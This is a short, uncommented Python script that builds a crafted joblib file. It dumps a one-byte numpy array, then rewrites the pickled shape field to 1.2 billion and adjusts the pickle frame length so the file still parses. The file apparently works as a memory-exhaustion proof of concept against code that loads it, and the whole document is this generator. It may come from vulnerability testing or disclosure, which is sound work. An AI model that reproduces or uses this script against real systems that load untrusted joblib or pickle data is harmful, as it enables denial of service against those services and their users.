| #!/usr/bin/env python3 | |
| import pathlib | |
| import struct | |
| import joblib | |
| import numpy as np | |
| SHAPE_PATTERN = b"\x8c\x05shape\x94K\x01\x85\x94" | |
| def build(out_path: pathlib.Path, shape: int = 1_200_000_000) -> None: | |
| seed_path = out_path.with_suffix(".seed") | |
| joblib.dump(np.zeros((1,), dtype=np.uint8), seed_path, compress=0) | |
| data = bytearray(seed_path.read_bytes()) | |
| seed_path.unlink() | |
| pos = data.find(SHAPE_PATTERN) | |
| if pos < 0: | |
| raise RuntimeError("shape pattern not found in seed joblib file") | |
| replacement = ( | |
| b"\x8c\x05shape\x94J" + struct.pack("<i", shape) + b"\x85\x94" | |
| ) | |
| delta = len(replacement) - len(SHAPE_PATTERN) | |
| data[pos : pos + len(SHAPE_PATTERN)] = replacement | |
| frame_len = struct.unpack_from("<Q", data, 3)[0] | |
| struct.pack_into("<Q", data, 3, frame_len + delta) | |
| out_path.write_bytes(data) | |
| def main() -> None: | |
| out_path = pathlib.Path("joblib-inline-shape-1200m.joblib") | |
| build(out_path) | |
| print(f"wrote {out_path} ({out_path.stat().st_size} bytes)") | |
| if __name__ == "__main__": | |
| main() | |